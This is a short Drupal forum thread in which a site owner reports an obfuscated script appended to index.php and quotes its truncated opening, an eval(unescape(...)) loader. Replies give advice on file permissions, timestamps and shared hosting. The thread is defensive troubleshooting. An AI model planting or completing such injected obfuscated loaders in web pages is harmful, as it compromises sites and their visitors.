By faunapolis on
Hi,
I am using drupal 5.3, and have what I think is a security breach on two of my sites in the same server. I first noticed that the sites would not show anything, and found out that it was a script added at the end of index.php which rendered the page useless (at least for me).
This is the first part of the script:
<script>eval(unescape("%77%69%6e%64%6f%77...........%27%29")); </script>
I removed a good part of it just in case; I have no idea where it came from. Anybody have any encounters of this kind?
Thanks in advance
Comments
...
You may want to paste that code into a URL decoder to try to learn more.
Someone has write access to your files. (You should have checked the 'last modified' timestamp on this file to see when it happened.) Are you using shared hosting? Maybe some other user on that server is evil. You should check the permissions of the folder containing this file and of this file to see if you grant 'write' access to anybody else.
(There's a lesser chance that this modification originated in code run by Drupal, because the server user usually don't have permission to write to this file.)
It's probably not a security breach in Drupal itself, but it sure is in your site.
Note that security matters should be discussed privately, here.
Thank you
I think this was a breach at the server level. As apparently some other sites in the same server had the same problem. Thank you very much,
http://www.faunapolis.org/